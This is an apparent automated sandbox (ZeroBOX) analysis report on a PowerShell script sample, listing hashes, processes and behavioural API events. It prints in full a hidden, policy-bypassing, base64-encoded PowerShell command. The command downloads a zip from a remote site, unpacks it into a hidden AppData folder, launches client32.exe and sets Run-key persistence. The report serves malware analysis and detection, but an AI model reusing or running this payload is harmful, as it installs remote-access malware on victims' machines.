Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 27, 2023, 10:20 a.m.	April 27, 2023, 10:23 a.m.

Size	4.8KB
Type	ASCII text, with very long lines, with no line terminators
MD5	`f5e06be9bc58695ff043f1d9465fb519`
SHA256	`6d5447309aa65dbb479d8094d7576aed61a53225291445d34daea4c108af3440`
CRC32	`2804C2DA`
ssdeep	`48:i/1iHsU3uuSHShfM9qh34L0+QUvfcPB5z4OfUXmWcAePXhXdrycrX/oRSp52Mbqe:QVLSii3exrm5psczp5XCRnsDo3TWmhG`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\doc.ps1
3064
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc JgAoACcAYwBkACcAKQAgACQAewBFAE4AYABWADoAYQBQAGAAcABEAGAAQQBUAGEAfQA7ACAAJAB7AEwAYABJAE4AawB9AD0AKAAiAHsANAB9AHsAMgB9AHsAMQB9AHsAMAB9AHsAMQAwAH0AewA4AH0AewA1AH0AewAzAH0AewA5AH0AewA3AH0AewA2AH0AewAxADEAfQAiACAALQBmACAAJwBwACcALAAnAHIAZQBzACcALAAnAHMAOgAvAC8AJwAsACcAaQAnACwAJwBoAHQAdABwACcALAAnAGUAbgB0AC8AcABsAHUAZwAnACwAJwBnAGkAdgAnACwAJwBzAC8AJwAsACcAbwBuAHQAJwAsACcAbgAnACwAJwByAG8ALgBpAGQALwB3AHAALQBjACcALAAnAGUAbQBlAC4AcABoAHAAJwApADsAIAAkAHsAcgBuAGAAVQBNAH0APQAmACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAgACcAYQBuAGQAJwAsACcAbwBtACcALAAnAEcAZQB0AC0AUgAnACkAIAAtAG0AaQBuAGkAbQB1AG0AIAA1ACAALQBtAGEAeABpAG0AdQBtACAAOQA7ACAAJAB7AHIAYABSAG4AYABVAE0AfQA9ACYAKAAiAHsAMwB9AHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACAAJwBSAGEAbgBkACcALAAnAG8AbQAnACwAJwAtACcALAAnAEcAZQB0ACcAKQAgAC0AbQBpAG4AaQBtAHUAbQAgADEAMAAyADQAIAAtAG0AYQB4AGkAbQB1AG0AIAA5ADkAOQA5ADsAIAAkAHsAQwBIAGAAUgBzAH0APQAoACIAewA4AH0AewA5AH0AewA2AH0AewAyAH0AewAxADAAfQB7ADEAMQB9AHsAMQAyAH0AewAwAH0AewAxADQAfQB7ADQAfQB7ADEAMwB9AHsANQB9AHsAMwB9AHsANwB9AHsAMQB9ACIAIAAtAGYAIAAnAEQAJwAsACcAUABSAFMAVABVAFYAVwBYAFkAWgAnACwAJwBwAHMAdAB1AHYAdwAnACwAJwBLAEwATQAnACwAJwBGACcALAAnAEoAJwAsACcAbQBuAG8AJwAsACcATgBPACcALAAnAGEAYgBjAGQAZQBmAGcAaABpACcALAAnAGoAawBsACcALAAnAHgAJwAsACcAeQB6ACcALAAnAEEAQgBDACcALAAnAEcASABJACcALAAnAEUAJwApADsAIAAkAHsAUgBgAFMAVABSAH0APQAnACcAOwAgACQAewByAGAAQQBuAH0APQAuACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACcATgBlAHcALQBPACcALAAnAGIAagBlACcALAAnAGMAJwAsACcAdAAnACkAIAAoACIAewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAGYAIAAnAG0ALgBSAGEAJwAsACcAUwB5AHMAdABlACcALAAnAG0AJwAsACcAbgBkAG8AJwApADsAIABmAG8AcgAgACgAJAB7AGkAfQA9ADAAOwAgACQAewBpAH0AIAAtAGwAdAAgACQAewByAGAATgB1AE0AfQA7ACAAJAB7AEkAfQArACsAKQAgAHsAJAB7AHIAcwBgAFQAUgB9ACsAPQAkAHsAYwBgAGgAUgBzAH0AWwAkAHsAcgBgAEEAbgB9AC4AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAG4AZQB4ACcALAAnAHQAJwApAC4ASQBuAHYAbwBrAGUAKAAwACwAIAAkAHsAQwBoAGAAUgBTAH0ALgAiAEwARQBuAEcAYABUAGgAIgApAF0AfQA7ACAAJAB7AFIAWgBgAGkAcAB9AD0AJAB7AHIAcwBgAFQAUgB9ACsAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcALgAnACwAJwB6AGkAcAAnACkAOwAgACQAewBQAGAAQQB0AGgAfQA9ACQAewBFAG4AVgA6AGAAQQBwAFAAYABEAEEAVABBAH0AKwAnAFwAJwArACQAewBSAGAAWgBpAHAAfQA7ACAAJAB7AFAAegBgAGkAcAB9AD0AJAB7AEUAbgBgAFYAOgBBAGAAcABQAGQAQQBgAFQAYQB9ACsAKAAoACgAIgB7ADQAfQB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQAiACAALQBmACcAdQBwAGQAJwAsACcATgAwAFQARQAnACwAJwBOAEUAJwAsACcAYQB0AGUAXwAnACwAJwBRAHQAUwBPACcAKQApAC4AIgBSAGUAcABgAEwAYQBgAGMAZQAiACgAJwBRAHQAUwAnACwAWwBTAFQAUgBpAE4AZwBdAFsAQwBoAEEAUgBdADkAMgApACkAKwAkAHsAUgByAGAATgBgAFUAbQB9ADsAIAAuACgAIgB7ADQAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADUAfQB7ADIAfQAiAC0AZgAgACcAdABhAHIAdAAnACwAJwAtACcALAAnAHIAJwAsACcAQgBpAHQAcwBUAHIAJwAsACcAUwAnACwAJwBhAG4AcwBmAGUAJwApACAALQBTAG8AdQByAGMAZQAgACQAewBsAGkAYABOAEsAfQAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJAB7AFAAQQBgAFQAaAB9ADsAIAAmACgAIgB7ADMAfQB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAnAHYAJwAsACcAZQAnACwAJwBoAGkAJwAsACcAZQB4AHAAYQBuAGQALQBhAHIAYwAnACkAIAAtAHAAYQB0AGgAIAAkAHsAUABhAGAAVABIAH0AIAAtAGQAZQBzAHQAaQBuAGEAdABpAG8AbgBwAGEAdABoACAAJAB7AFAAWgBgAGkAcAB9ADsAIAAkAHsAZgBgAE8ATABkAH0APQAmACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACcAZQAnACwAJwBHACcALAAnAHQALQBJAHQAZQBtACcAKQAgACQAewBwAFoAYABJAFAAfQAgAC0ARgBvAHIAYwBlADsAIAAkAHsAZgBvAGAAbABEAH0ALgAiAGEAYABUAHQAcgBgAGkAQgBgAFUAdABlAFMAIgA9ACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbgAnACwAJwBIAGkAZABkAGUAJwApADsAIAAmACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiACAALQBmACcAZQBtAG8AdgBlAC0AJwAsACcAUgAnACwAJwBlAG0AJwAsACcASQB0ACcAKQAgAC0AcABhAHQAaAAgACQAewBwAGAAQQB0AEgAfQA7ACAAJgAoACcAYwBkACcAKQAgACQAewBQAHoAYABJAFAAfQA7ACAAJgAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHMAdABhAHIAJwAsACcAdAAnACkAIAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAGUAeABlACcALAAnADIALgAnACwAJwBjAGwAaQBlAG4AdAAzACcAKQA7ACAAJAB7AGYAYABzAFQAUgB9AD0AJAB7AHAAYABaAEkAcAB9ACsAKAAoACgAIgB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQAiACAALQBmACAAJwBxAEwAbwBjAGwAaQBlAG4AJwAsACcAdAAzACcALAAnAC4AZQB4AGUAJwAsACcAMgAnACkAKQAtAEMAcgBlAFAAbABhAGMAZQAgACAAKABbAGMASABhAFIAXQAxADEAMwArAFsAYwBIAGEAUgBdADcANgArAFsAYwBIAGEAUgBdADEAMQAxACkALABbAGMASABhAFIAXQA5ADIAKQA7ACAAJAB7AHIAYABOAE0AfQA9ACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAHAAZABhAHQAJwAsACcATwBOAEUATgAwAFQARQB1ACcALAAnAGUAXwAnACkAKwAkAHsAUgBgAFIATgBgAFUATQB9ADsAIAAuACgAIgB7ADIAfQB7ADEAfQB7ADQAfQB7ADAAfQB7ADMAfQAiACAALQBmACcAdAAnACwAJwBlAHcALQAnACwAJwBOACcALAAnAGUAbQBQAHIAbwBwAGUAcgB0AHkAJwAsACcASQAnACkAIAAtAFAAYQB0AGgAIAAoACgAKAAiAHsANQB9AHsAMwB9AHsAMQB9AHsANwB9AHsAOQB9AHsAMQAxAH0AewAyAH0AewA4AH0AewAxADAAfQB7ADQAfQB7ADAAfQB7ADYAfQAiACAALQBmACAAJwAwAH0AUgAnACwAJwBDAFUAOgB7ADAAfQBTACcALAAnAG8AZgB0AHsAMAB9AFcAaQBuAGQAbwB3ACcALAAnAEsAJwAsACcAZQByAHMAaQBvAG4AewAnACwAJwBIACcALAAnAHUAbgAnACwAJwBPAEYAVABXAEEAUgBFAHsAMAB9AE0AaQBjACcALAAnAHMAewAwAH0AQwB1AHIAcgBlACcALAAnAHIAJwAsACcAbgB0AFYAJwAsACcAbwBzACcAKQApAC0AZgAgAFsAQwBIAGEAcgBdADkAMgApACAALQBOAGEAbQBlACAAJAB7AFIAYABOAE0AfQAgAC0AVgBhAGwAdQBlACAAJAB7AGYAcwBgAFQAUgB9ACAAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAFMAdAByAGkAJwAsACcAbgBnACcAKQA7AA==
  1184

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (4 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 27, 2023, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 27, 2023, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 27, 2023, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 27, 2023, 10:20 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 27, 2023, 10:20 a.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW April 27, 2023, 10:20 a.m.	buffer: Processing -WindowStyle 'hid' failed: Cannot convert value "hid" to type "System.Diagnostics.ProcessWindowStyle" due to invalid enumeration values. Specify one of the following enumeration values and try again. The possible enumeration values are "Normal, Hidden, Minimized, Maximized". console_handle: 0x0000001f	1	1	0

Uses Windows APIs to generate a cryptographic key (15 events)

Time & API	Arguments	Status	Return
CryptExportKey April 27, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00418600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00419240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00419240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00419240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00418f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00418f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00418f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00418f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00418f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00418f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00418c80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00418c80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00418c80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00418c80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00418c80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 27, 2023, 10:20 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (24 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0273f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02689000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 1184 region_size: 458752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02970000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 1184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73971000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 1184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0280a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73972000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 1184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02802000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 1184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02812000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 1184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 1184 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 1184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0283a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 1184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02813000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 1184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02814000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 1184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028cb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 1184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 1184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0280b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 1184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02832000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 1184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 1184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02815000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 1184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0283c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 1184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 10:20 a.m.	process_identifier: 1184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02816000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc JgAoACcAYwBkACcAKQAgACQAewBFAE4AYABWADoAYQBQAGAAcABEAGAAQQBUAGEAfQA7ACAAJAB7AEwAYABJAE4AawB9AD0AKAAiAHsANAB9AHsAMgB9AHsAMQB9AHsAMAB9AHsAMQAwAH0AewA4AH0AewA1AH0AewAzAH0AewA5AH0AewA3AH0AewA2AH0AewAxADEAfQAiACAALQBmACAAJwBwACcALAAnAHIAZQBzACcALAAnAHMAOgAvAC8AJwAsACcAaQAnACwAJwBoAHQAdABwACcALAAnAGUAbgB0AC8AcABsAHUAZwAnACwAJwBnAGkAdgAnACwAJwBzAC8AJwAsACcAbwBuAHQAJwAsACcAbgAnACwAJwByAG8ALgBpAGQALwB3AHAALQBjACcALAAnAGUAbQBlAC4AcABoAHAAJwApADsAIAAkAHsAcgBuAGAAVQBNAH0APQAmACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAgACcAYQBuAGQAJwAsACcAbwBtACcALAAnAEcAZQB0AC0AUgAnACkAIAAtAG0AaQBuAGkAbQB1AG0AIAA1ACAALQBtAGEAeABpAG0AdQBtACAAOQA7ACAAJAB7AHIAYABSAG4AYABVAE0AfQA9ACYAKAAiAHsAMwB9AHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACAAJwBSAGEAbgBkACcALAAnAG8AbQAnACwAJwAtACcALAAnAEcAZQB0ACcAKQAgAC0AbQBpAG4AaQBtAHUAbQAgADEAMAAyADQAIAAtAG0AYQB4AGkAbQB1AG0AIAA5ADkAOQA5ADsAIAAkAHsAQwBIAGAAUgBzAH0APQAoACIAewA4AH0AewA5AH0AewA2AH0AewAyAH0AewAxADAAfQB7ADEAMQB9AHsAMQAyAH0AewAwAH0AewAxADQAfQB7ADQAfQB7ADEAMwB9AHsANQB9AHsAMwB9AHsANwB9AHsAMQB9ACIAIAAtAGYAIAAnAEQAJwAsACcAUABSAFMAVABVAFYAVwBYAFkAWgAnACwAJwBwAHMAdAB1AHYAdwAnACwAJwBLAEwATQAnACwAJwBGACcALAAnAEoAJwAsACcAbQBuAG8AJwAsACcATgBPACcALAAnAGEAYgBjAGQAZQBmAGcAaABpACcALAAnAGoAawBsACcALAAnAHgAJwAsACcAeQB6ACcALAAnAEEAQgBDACcALAAnAEcASABJACcALAAnAEUAJwApADsAIAAkAHsAUgBgAFMAVABSAH0APQAnACcAOwAgACQAewByAGAAQQBuAH0APQAuACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACcATgBlAHcALQBPACcALAAnAGIAagBlACcALAAnAGMAJwAsACcAdAAnACkAIAAoACIAewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAGYAIAAnAG0ALgBSAGEAJwAsACcAUwB5AHMAdABlACcALAAnAG0AJwAsACcAbgBkAG8AJwApADsAIABmAG8AcgAgACgAJAB7AGkAfQA9ADAAOwAgACQAewBpAH0AIAAtAGwAdAAgACQAewByAGAATgB1AE0AfQA7ACAAJAB7AEkAfQArACsAKQAgAHsAJAB7AHIAcwBgAFQAUgB9ACsAPQAkAHsAYwBgAGgAUgBzAH0AWwAkAHsAcgBgAEEAbgB9AC4AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAG4AZQB4ACcALAAnAHQAJwApAC4ASQBuAHYAbwBrAGUAKAAwACwAIAAkAHsAQwBoAGAAUgBTAH0ALgAiAEwARQBuAEcAYABUAGgAIgApAF0AfQA7ACAAJAB7AFIAWgBgAGkAcAB9AD0AJAB7AHIAcwBgAFQAUgB9ACsAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcALgAnACwAJwB6AGkAcAAnACkAOwAgACQAewBQAGAAQQB0AGgAfQA9ACQAewBFAG4AVgA6AGAAQQBwAFAAYABEAEEAVABBAH0AKwAnAFwAJwArACQAewBSAGAAWgBpAHAAfQA7ACAAJAB7AFAAegBgAGkAcAB9AD0AJAB7AEUAbgBgAFYAOgBBAGAAcABQAGQAQQBgAFQAYQB9ACsAKAAoACgAIgB7ADQAfQB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQAiACAALQBmACcAdQBwAGQAJwAsACcATgAwAFQARQAnACwAJwBOAEUAJwAsACcAYQB0AGUAXwAnACwAJwBRAHQAUwBPACcAKQApAC4AIgBSAGUAcABgAEwAYQBgAGMAZQAiACgAJwBRAHQAUwAnACwAWwBTAFQAUgBpAE4AZwBdAFsAQwBoAEEAUgBdADkAMgApACkAKwAkAHsAUgByAGAATgBgAFUAbQB9ADsAIAAuACgAIgB7ADQAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADUAfQB7ADIAfQAiAC0AZgAgACcAdABhAHIAdAAnACwAJwAtACcALAAnAHIAJwAsACcAQgBpAHQAcwBUAHIAJwAsACcAUwAnACwAJwBhAG4AcwBmAGUAJwApACAALQBTAG8AdQByAGMAZQAgACQAewBsAGkAYABOAEsAfQAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJAB7AFAAQQBgAFQAaAB9ADsAIAAmACgAIgB7ADMAfQB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAnAHYAJwAsACcAZQAnACwAJwBoAGkAJwAsACcAZQB4AHAAYQBuAGQALQBhAHIAYwAnACkAIAAtAHAAYQB0AGgAIAAkAHsAUABhAGAAVABIAH0AIAAtAGQAZQBzAHQAaQBuAGEAdABpAG8AbgBwAGEAdABoACAAJAB7AFAAWgBgAGkAcAB9ADsAIAAkAHsAZgBgAE8ATABkAH0APQAmACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACcAZQAnACwAJwBHACcALAAnAHQALQBJAHQAZQBtACcAKQAgACQAewBwAFoAYABJAFAAfQAgAC0ARgBvAHIAYwBlADsAIAAkAHsAZgBvAGAAbABEAH0ALgAiAGEAYABUAHQAcgBgAGkAQgBgAFUAdABlAFMAIgA9ACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbgAnACwAJwBIAGkAZABkAGUAJwApADsAIAAmACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiACAALQBmACcAZQBtAG8AdgBlAC0AJwAsACcAUgAnACwAJwBlAG0AJwAsACcASQB0ACcAKQAgAC0AcABhAHQAaAAgACQAewBwAGAAQQB0AEgAfQA7ACAAJgAoACcAYwBkACcAKQAgACQAewBQAHoAYABJAFAAfQA7ACAAJgAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHMAdABhAHIAJwAsACcAdAAnACkAIAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAGUAeABlACcALAAnADIALgAnACwAJwBjAGwAaQBlAG4AdAAzACcAKQA7ACAAJAB7AGYAYABzAFQAUgB9AD0AJAB7AHAAYABaAEkAcAB9ACsAKAAoACgAIgB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQAiACAALQBmACAAJwBxAEwAbwBjAGwAaQBlAG4AJwAsACcAdAAzACcALAAnAC4AZQB4AGUAJwAsACcAMgAnACkAKQAtAEMAcgBlAFAAbABhAGMAZQAgACAAKABbAGMASABhAFIAXQAxADEAMwArAFsAYwBIAGEAUgBdADcANgArAFsAYwBIAGEAUgBdADEAMQAxACkALABbAGMASABhAFIAXQA5ADIAKQA7ACAAJAB7AHIAYABOAE0AfQA9ACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAHAAZABhAHQAJwAsACcATwBOAEUATgAwAFQARQB1ACcALAAnAGUAXwAnACkAKwAkAHsAUgBgAFIATgBgAFUATQB9ADsAIAAuACgAIgB7ADIAfQB7ADEAfQB7ADQAfQB7ADAAfQB7ADMAfQAiACAALQBmACcAdAAnACwAJwBlAHcALQAnACwAJwBOACcALAAnAGUAbQBQAHIAbwBwAGUAcgB0AHkAJwAsACcASQAnACkAIAAtAFAAYQB0AGgAIAAoACgAKAAiAHsANQB9AHsAMwB9AHsAMQB9AHsANwB9AHsAOQB9AHsAMQAxAH0AewAyAH0AewA4AH0AewAxADAAfQB7ADQAfQB7ADAAfQB7ADYAfQAiA